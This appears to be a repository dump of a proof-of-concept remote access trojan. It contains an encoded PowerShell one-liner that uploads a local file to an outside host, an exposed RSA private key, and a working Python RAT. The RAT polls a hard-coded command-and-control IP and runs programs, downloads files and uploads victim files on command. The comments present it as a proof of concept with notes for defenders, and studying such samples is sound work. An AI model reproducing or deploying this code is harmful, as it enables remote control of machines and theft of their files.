76 | powershell -enc JABGAGkAbABlAFAAYQB0AGgAIAA9ACAAKABnAGMAIAAkAGUAbgB2ADoAVABFAE0AUABcAG0AcwBiAHUAaQBsAGQALgB0AHgAdAApADsAIAAkAFQAYQByAGcAZQB0AFAAYQB0AGgAIAA9ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABNAGkAYwByAG8AcwBvAGYAdABCAHUAaQBsAGQARQB2AGUAbgB0AHMAIgA7ACAAJABkAGEAdABlACAAPQAgACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAIgAlAFkALQAlAG0ALQAlAGQALQAtACUASAAtACUATQAtACUAUwAiACkAOwAgAG0AawBkAGkAcgAgACQAVABhAHIAZwBlAHQAUABhAHQAaAAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAiACQARgBpAGwAZQBQAGEAdABoACIALgBSAGUAcABsAGEAYwBlACgAIgAnACIALAAiACIAKQAgACIAJABUAGEAcgBnAGUAdABQAGEAdABoAFwAJABkAGEAdABlACIALgBSAGUAcABsAGEAYwBlACgAIgAnACIALAAiACIAKQA7ACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAIgBOAG8AIABSAGUAcABvAG4AcwBlACIAOwAgAHQAcgB5ACAAewAgACQAcgBlAHMAcABvAG4AcwBlACAAPQAgACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AVQBwAGwAbwBhAGQARgBpAGwAZQBBAHMAeQBuAGMAKAAiAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAC4AaABvAG8AawB1AHAAZgBhAGkAbABzAC4AYwBvAG0ALwB1AHAAbABvAGEAZABDAGEAdABjAGgAZQByAC4AcABoAHAAIgAsACQARgBpAGwAZQBQAGEAdABoAC4AUgBlAHAAbABhAGMAZQAoACIAJwAiACwAIgAiACkAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAgAH0AIABjAGEAdABjAGgAIAB7AH0AOwAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJAByAGUAcwBwAG8AbgBzAGUAOwAgAHMAbABlAGUAcAAgADMAIAA=
77 |
78 |
85 |
--------------------------------------------------------------------------------
/RattyMcRatFace_Keys.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIIEowIBAAKCAQEAicD1XiDlkSsqpPG+iGg1qxZFaVEngT8Vt4AJ1LpJxay2K4b/V2ukGi/zIrsz
3 | L4KT61orPCpKiBz6eXp3ecuvSOXj/aAex5QAthFANrkilxTjWAEEBzgWCO1CkCoS/f3taJsSi45H
4 | 9XYSrnHgUHaXx7oEyUTIAgPgoUUYbeSA0IHZ7pjdE6TPT01+QyXnfS99zfqUH/nVM9n/3waJAOdy
5 | esFgaDMUBddD4PSZKttyYuwH2DCXIXwpuTUwMIVOkgHZoLm79NqgozldyghdV3box1sRr4u9TFIL
6 | gzcFT3gqxtd38ZI/gD2tmkbu2lFBXyjMQWm6K425MYQod0Zfxm9acwIDAQABAoIBAC6UIGODnBxK
7 | DFFZrKNTGVKQZUgHOORrAFzb3ncfxnIgxDhTnWNh8ksoi33i7pvR+1JJWvUtF6aOpeMNlfiI9uwf
8 | T8girEWvtc3aZ2wZjaioV3caYNJQFKNQFoHIuENJ6UzFoq+tnIdTNV3nA4Ixl4DhVVz49Og5h2sA
9 | ghImgaf+vSJoTduvtm+jNEfop7TCSH52zHY1V8zBA9mg7/Eg13XhKnOuIUzsPgHwCGq1yxcTWRG+
10 | /dg59/wTFdDjeNDSTXiEnxJsRGrnhlz81luOSbvWtWd3AIB4tvvqvL9YowYAd1HKoDF80GiKHDBT
11 | mJy/QyYd9pltGGHpjn9U7BVlLAECgYEA8ieLTzkvvOU1cori8uUfp8PqdJSUQcddkjKOLxIUuKtT
12 | Plt52yEZo4s0hHDaTu0+8r4O2MyimLhWaapsbDpJGRpmIItwGst1sXwJ259HuIxplculy6ryk1wT
13 | xJZgYUhuLkT44WzrvPTbtySL3FTpXPi+EKZUAOmwOXARJOqIM2ECgYEAkaFIg6QkpKDhGpAv6+++
14 | ig/8Z3scN+ervWaL1WFp0t7bXkAxrcSbfWv0FeV2Qi3K1vAUn+9Ipr6SC8q/3Xy+3xUujUhiT5pC
15 | pE31CpZOLhR98jUVWubD71HQtxZfqVkIphEg1JnqmAwRJakFD3TO3q3Di054izESCM1/xbzV8lMC
16 | gYB64dhO3p08BTCHLLWYPu8+aiwK9u75Jlt0ehUvC8TaJY67oR4INhbVqCmBX+dYkAoWkp3kJIwK
17 | ZdjsDCCzFyzLAVt7/mZoIoFaDLDP81co7pASBOLgpKIuZ1Zct1a3Z1MKRdPqSSSjobnxiSk0KR63
18 | ID8LIeyU/gGAVD9O9XkiYQKBgEWok/sD5NMqcQI3vfRpNQbtJpqI9LJ5ClkKWBC1C91l5CBtLFYm
19 | GQohPRvMKoj1RnURWYw29NVtioZBcQ0MwnAKvb2uxfe1nfLhpzhtNPAttSDJ63ETuN0ckW1CMnfa
20 | spxczQtkpCYef4U4F8eQ4/L3wvU7j8Vkr2+ufFOlQ+EpAoGBAJWxgaqGa35NGRmUONki9F/dRhW5
21 | Vdbn+EyDnT0vLThl5RQIXGXsI/jYWGkpvY/6D5L9riBEx8xRXI2+DFLGVgqmVBolvi6jVpzT1JBb
22 | Ekvr6AZcKe4Dhc0DnhtWcrqK+LvVy0lje1eqZAtxrpFCyMEuyFqNOQgks6neHr7sqbJL
23 | -----END RSA PRIVATE KEY-----
--------------------------------------------------------------------------------
/pyRattyMcRatFace.py:
--------------------------------------------------------------------------------
# Python variant of the proof-of-concept RAT. It polls one hard-coded URL over
# plain HTTP and dispatches on the first word of the reply
# (run / download / upload / exit).
# Defender notes: the loop at the bottom has no delay between requests, the
# server is not authenticated, and nothing is reported back except through the
# "upload" command.
import requests
from subprocess import call

def GetCommand(c2):
    """Return the body of the page at ``c2`` as text."""
    return (requests.get(c2)).text

def ShellExecute(cmd, cmdArgs):
    """Run ``cmd`` with the single argument ``cmdArgs`` and wait for it to finish.

    The argument list is passed to ``call`` directly, without a shell.
    """
    call([cmd, cmdArgs])

def Download(url, fileName):
    """Fetch ``url`` and write the response body to the local path ``fileName``."""
    open(fileName,'wb').write(requests.get(url).content)

def Upload(url, fileName):
    """POST the local file ``fileName`` to ``url`` as a multipart field named 'file'."""
    files = {'file': open(fileName, 'rb')}
    requests.post(url, files=files)

# Hard-coded command source, fetched over unencrypted HTTP.
c2 = "http://64.137.224.218/file.html"
while True:
    cmdString = GetCommand(c2)
    # An empty reply makes split()[0] raise IndexError, which is not caught here.
    cmd = cmdString.split()[0]
    if cmd == "run":
        # Only the second and third words are used: one program, one argument.
        ShellExecute(cmdString.split()[1], cmdString.split()[2])
    elif cmd == "download":
        Download(cmdString.split()[1], cmdString.split()[2])
    elif cmd == "upload":
        # Unlike the C# client, the destination URL comes from the command itself.
        Upload(cmdString.split()[1], cmdString.split()[2])
    elif cmd == "exit":
        exit()
    else:
        # Unknown first word: ignored, and the loop polls again immediately.
        pass
--------------------------------------------------------------------------------